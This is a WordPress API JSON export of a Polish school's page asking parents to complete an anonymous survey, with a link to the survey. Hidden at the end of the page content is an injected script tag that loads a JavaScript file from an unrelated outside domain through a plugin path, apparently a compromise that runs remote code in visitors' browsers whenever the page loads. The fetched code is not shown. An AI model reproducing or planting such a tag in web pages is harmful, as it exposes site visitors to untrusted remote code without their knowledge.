{"id":12712,"date":"2019-10-03T12:38:02","date_gmt":"2019-10-03T10:38:02","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=12712"},"modified":"2020-04-23T09:19:55","modified_gmt":"2020-04-23T07:19:55","slug":"ankieta","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/ankieta\/","title":{"rendered":"Ankieta"},"content":{"rendered":"<p>Szanowni Pa\u0144stwo!<\/p>\n<p>Wszystkim nam zale\u017cy na tym, \u017ceby nasza szko\u0142a spe\u0142nia\u0142a Wasze oczekiwania. Aby tego dokona\u0107 musimy zna\u0107 Pa\u0144stwa zdanie na niekt\u00f3re tematy. W zwi\u0105zku z tym bardzo prosimy o wype\u0142nienie kr\u00f3tkiej anonimowej ankiety. Im wi\u0119cej szczerych odpowiedzi, tym lepiej dopasujemy si\u0119 do Pa\u0144stwa oczekiwa\u0144.<\/p>\n<p>Link do ankiety:<br \/>\n<a href=\"https:\/\/www.interankiety.pl\/i\/K7JlKGMW\" target=\"_blank\" rel=\"noopener\">Ankieta<\/a><\/p>\n<p>&nbsp;<script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Szanowni Pa\u0144stwo! Wszystkim nam zale\u017cy na tym, \u017ceby nasza szko\u0142a spe\u0142nia\u0142a Wasze oczekiwania. Aby tego dokona\u0107 musimy zna\u0107 Pa\u0144stwa zdanie na niekt\u00f3re tematy. W zwi\u0105zku z tym bardzo prosimy o wype\u0142nienie kr\u00f3tkiej anonimowej ankiety. Im wi\u0119cej szczerych odpowiedzi, tym lepiej dopasujemy si\u0119 do Pa\u0144stwa oczekiwa\u0144. Link do ankiety: Ankieta &nbsp;<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/12712"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=12712"}],"version-history":[{"count":4,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/12712\/revisions"}],"predecessor-version":[{"id":14994,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/12712\/revisions\/14994"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=12712"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}